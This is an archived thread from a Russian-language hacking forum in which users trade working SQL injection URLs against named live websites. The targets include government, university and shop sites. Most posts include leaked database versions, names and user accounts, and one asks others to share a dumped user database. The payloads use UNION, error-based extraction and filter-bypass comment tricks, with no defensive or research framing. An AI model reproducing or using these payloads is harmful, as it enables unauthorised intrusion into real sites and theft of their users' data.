SQL Инъекции [Архив] - Страница 2

Просмотр полной версии : SQL Инъекции

Страницы : 1 [2]

look2009

09.09.2020, 09:17

DezMond™ said:
↑ (https://antichat.live/posts/4304985/)

Code:
http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+

В линке начали фильтровать union

Теперь работает так.

Code:
http://www.fc-utd.co.uk/report.php?match_id=-1901/*!50000union*/%20/*!50000SeLeCt*/%20/*!50000version()*/%20--#

DezMond™

29.01.2021, 12:08

Code:
https://www.carmona.org/actualidad/publicacion.php?pub=-8a5c161549d42e54e0ef1c2bf8d03cf0%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39+from+information_schema.tables+W HERE+table_schema=database()+limit+24,1+--+

Duble

24.02.2021, 00:07

Экономическая игра с выводом денег.

Code:
https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(user()))))--'
https://golden-oligarch.biz/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and(1)='1/
https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES/**/LIMIT/**/40,1),(':'))))--'
https://golden-oligarch.biz/1'or(ExtractValue(1,concat(0x3a,(database()))))--'

з.ы. сольете поделитесь базой, если не жалко.

Мап не льет, по другому лень.

sepo

03.03.2021, 21:54

Code:
http://www.elcor.ma/fiche_actualite.php?id=-77+union+select+1,concat_ws(0x3a,database(),user() ,version()),3,4,5,6,7,8--

sepo

09.07.2021, 15:59

Code:
http://mapexpert.com.ua/index_ru.php?id=-20+union+select+1,2,database(),4,version(),6,7,8,9 ,10,11--&table=news

Группа «MapExpert» была создана в 2008 году с целью популяризации дистанционного зондирования Земли (ДЗЗ (http://mapexpert.com.ua/index_ru.php?table=Menu&id=14)) и географических информационных систем (ГИС (http://mapexpert.com.ua/index_ru.php?id=13&table=Menu)) и их технологий на территории стран СНГ.

DezMond™

24.11.2021, 10:55

Code:
http://heda.cndp.fr/gothique.php?projet=1&notice=46+AND+extractvalue(1,concat(0x3a,(select+u ser())))--

erbolg

19.12.2021, 09:56

Code:
https://www.ascent-gt.com/news-full.php?id=-1+/*!12345union*/+select+1,user(),version(),database(),5,6

DAILYNF1_USER@GATOR4233.HOSTGATOR.COM (mailto:DAILYNF1_USER@GATOR4233.HOSTGATOR.COM)

5.6.41-84.1

dailynf1_daily

erbolg

20.12.2021, 14:06

Code:
http://ubise-officepro.com/fr/produit.php?id=-142+union+select+1,2,3,4,concat_ws(0x23,version(), database(),user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27--+-

5.6.50-log

ubiseoffbhoffice

ubiseoffbhoffice@10.3.20.230

Code:
http://www.landcraft-projects.co.uk/newsitem.php?pageid=-2%27+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user ()),3,4,5,6,7,8,9,10--+-

5.7.36-log

db471655925

dbo471655925@infong400.clienthosting.eu (mailto:dbo471655925@infong400.clienthosting.eu)

Code:
https://upm.dipanegara.ac.id/page.php?id=-14+union+select+1,2,concat_ws(0x23,version(),datab ase(),user())--+-

5.7.36

admin_upm

admin_root@localhost

erbolg

27.12.2021, 20:00

Code:
https://mhms.gov.ki/category.php?id=-10%27+union+select+1,concat_ws(0x23,version(),data base(),user())--+-

10.1.48-MariaDB

blog_admin_db

root@localhost

erbolg

31.12.2021, 10:34

Code:
https://itra.digitalindiacorporation.in/MIS/admin/profile_view.php?p_name=Gaurav%20Sharma%27+union+s elect+1,2,concat_ws(0x23,version(),database(),user ()),4,5,6,7,8,9,10,11,12,13,14,15,16--+-

5.7.33-0ubuntu0.16.04.1

itra_mis

gaurav@localhost

Code:
http://www.crumbweb.org/newsdetail.php?sublink=1&id=-112+union+select+1,2,concat_ws(0x23,version(),data base(),user()),4,5,6,7--+-

5.6.49-89.0-56

crumbweb_crumb2coredatabase

crumbweb@10.0.0.52

Code:
http://acme-et.com/category.php?id=-16+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user ()),3,4,5--+-

5.6.41-84.1

acmeet_acme

acmeet_acme@crossblade.websitewelcome.com (mailto:acmeet_acme@crossblade.websitewelcome.com)

erbolg

14.01.2022, 08:42

Code:
http://www.bookgroup.info/041205/review.php?id=-53+union+select+1,2,3,concat_ws(0x23,version(),dat abase(),user()),5--+-

5.0.95

haynes

haynes@65.36.196.37

Code:
http://www.techsoeng.com/curriculum.php?id=-29%27+union+select+1,2,concat_ws(0x23,version(),da tabase(),user()),4,5,6,7,8,9,10--+-&id_foto=54

5.5.62-38.14-LOG

SQL845107_1

SQL845107@62.149.145.38

Code:
http://www.horpak4u.com/view_detail.php?id=-3245%27+union+select+1,concat_ws(0x23,version(),da tabase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6--+-

5.7.37

horpak4u_data2

horpak4u_nueng@localhost

Duble

25.01.2022, 10:08

https://leakedreality.com/ads.php?id=1' UNION ALL SELECT NULL,NULL,CONCAT_WS(0x7C,database(),user(),version ()),NULL,NULL,NULL,NULL,NULL-- - (https://leakedreality.com/ads.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL ,CONCAT_WS(0x7C,version(),database(),user(),versio n()),NULL,NULL,NULL,NULL,NULL--%20-)

108к юзеров

erbolg

27.01.2022, 10:32

Code:
http://www.assassinatedrecords.com/prod_info.php?id=-69%27+/*!12345union*/+select+1,2,concat_ws(0x23,version(),database(),us er()),4,5,6,7,8,9,10,11,12,13—+-

5.5.60-0+Deb7U1-Log

Db272916802

Dbo272916802@74.208.57.152

Code:
https://dbsoft.org/newsitem.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x23,version() ,database(),user()),7--+-

5.7.34-log

nuke

nuke@localhost

Code:
http://oneplanetschool.com/pages/newsDetail.php?id=-12+union+select+1,concat_ws(0x23,version(),databas e(),user()),3,4,5,6--+-

5.7.31-percona-sure1-log

oneplanet_mydb

oneplanetSol@localhost

Code:
https://www.ee.iitm.ac.in/news/newsdetail.php?id=-5%27+union+select+1,2,concat_ws(0x23,version(),dat abase(),user()),4,5,6,7,8,9--+-

10.6.5-MariaDB-1:10.6.5+maria~focal

eeMVCweb

eewebmvc@localhost

Code:
https://www.himachalirishta.com/viewphoto.php?id=HPR364711%27+union+select+1,conca t_ws(0x23,version(),database(),user()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4 2,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58, 59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75 ,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,9 2,93,94,95,96,97,98,99,100,1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,7 8,79,80,81,82,83,84,85,86,87,88,89,90,91--+-&Choice=1

10.1.44-MariaDB

himmat_hrlive

himmat@localhost

Code:
http://piriya-international.com/product.php?id=1/*!12345UNION*/select+1,2,3,4,concat_ws(0x23,version(),database() ,user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34--+-

10.2.38-MARIADB

NOPPADON_PIRIYA

NOPPADON_IDESIGN@LOCALHOST

Code:
http://www.terasz.hu/galeria/main.php?inc=sorozat_reszlet&sorozat_id=-1120+union+select+1,concat_ws(0x23,version(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18--+-

5.7.30

kulturfoto

terasz@194.180.12.87

Code:
https://www.lpmwatak.com/category.php?id=-4%27+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user ())%2d%2d+-

10.2.41-MariaDB-cll-lve

lpmd9334_db

lpmd9334_doni@localhost

Code:
https://ird.sut.ac.th/ird2020/readnews.php?id=-165%27+union+select+1,concat_ws(0x23,version(),dat abase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22%2d%2d+-

5.5.68-MariaDB

ird2020

ird2020@localhost

Code:
http://www.myekooo.com/productlist.php?id=-597+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,concat_ws(0x23,version(),data base(),user()),23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43--+-&tid=13

5.5.19

mysql3439283_db

mysql3439283@gpRYIr1386

Code:
http://www.samspedy.com/shop/product.php?id=63+union+select+1,2,concat_ws(0x23, version(),database(),user()),4,5,6,7,8,9,10,11,12, 13,14--+-

5.6.51-cll-lve

samspedy_shop

cherry@localhost

Code:
https://www.yuyama.com.hk/en/productlist.php?cat=-60+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x23, version(),database(),user()),28,29,30,31,32,33,34, 35,36,37,38,39,40--+-

5.5.65-MariaDB

yuyama

yuyama@localhost

erbolg

06.03.2022, 20:06

Code:
https://www.lateuaterra.com/news_item.php?id=-68+union+select+1,concat_ws(0x23,version(),databas e(),user()),3,4,5,6,7,8,9,10--+-&lang=100

5.5.55

terra2

user_terra2@localhost

Code:
https://www.buddhisma2z.com/content.php?id=-179/*!12345union*/select+1,2,3,4,concat_ws(0x23,version(),database() ,user()),6,7,8,9--+-

5.6.41-84.1

pitijoy_a2z

pitijoy_root@localhost

Code:
http://www.addzollubricants.com/product_details.php?product_id=-5/*!12345union*/select+1,2,concat_ws(0x23,version(),database(),use r()),4,5,6,7,8,9,10,11,12,13,14—+-

5.7.23-23

wwwc2csi_addzol

wwwc2csi_addzol@localhost

Code:
https://www.pyramidmachine.in/product_details.php?pr_id=73+union+select+1,concat _ws(0x23,version(),database(),user()),3,4,5,6,7--+-&main_cat_id=pQ==

5.7.36

pyramidm_pyarmid

pyramidm_admin@localhost

Code:
http://diabetesphilippines.org/HOME/viewevent.php?eventid=-615+union+all+select+concat_ws(0x23,version(),data base(),user()),2,3--+-

5.7.37-CLL-LVE

SOFTITPR_DB_DIABETESPHIL

SOFTITPR_DP@LOCALHOST

Code:
https://www.atcproductions.tv/hire/viewitem.php?itemid=-9+union+all+select+1,2,concat_ws(0x23,version(),da tabase(),user()),4,5,6,7,8,9--+-

5.6.51

atcprodu_hire

atcprodu_hire@localhost

Code:
http://imperium.su/pages.php?id=-5%27+union+select+1,2,3,4,concat_ws(0x23,version() ,database(),user()),6,7—+-

5.7.18-16

imperium_db1

imperium_db_user@localhost

Code:
https://myglobalshopee.com/product_details.php?id=-55fb8e3c27001b%27+union+select+1,2,concat_ws(0x23, version(),database(),user()),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30--+-

10.1.44-MARIADB

MYGSHOPE_MYGLOBS

MYGSHOPE_MYGLOBS@LOCALHOST

Code:
http://gba-corona.com/news.php?id=-6/*!12345union*/select+1,2,3,concat_ws(0x23,version(),database(),u ser())--+-

5.6.41-84.1

ibizhq_gba

ibizhq_gba@localhost

Huga12

12.04.2022, 20:31

http://www.marciadalmondo.com/ita/dettagli_news.aspx?id=-4326 AND 1=0 UNION SELECT '1',$$ injected by imns $$CHR(60)CHR(60)$$VERSION >>> $$version()CHR(60)CHR(60)$$DATABASE >>> $$current_database()CHR(60)CHR(60)$$DB FILES >>> $$CHR(60)CHR(60)$$ - HBA >>> $$current_setting($$hba_file$$)CHR(60)CHR(60)$$ - DIRECTORY >>> $$current_setting($$data_directory$$)CHR(60)CHR(60 )$$HOSTNAME AND IP ADDRESS >>> $$CHR(60)CHR(60)$$ - PORT >>> $$inet_server_port()CHR(60)CHR(60)$$ - ADDR >>> $$inet_server_addr()CHR(60)CHR(60)$$USER >>> $$userCHR(60)CHR(60)$$PRIVILEGES >>> $$(SELECT usename$$ >> $$usecreatedb$$ >> $$usesuper FROM pg_user)CHR(60)CHR(60)CHR(60)CHR(60)(SELECT ARRAY_TO_STRING(array(SELECT(CHR(60)CHR(60)table_n ameCHR(32)CHR(62)CHR(62)CHR(62)CHR(32)column_name) ::TEXT FROM information_schema.columns WHERE table_schema=$$public$$),CHR(60)CHR(60))),'3',null ,null--+-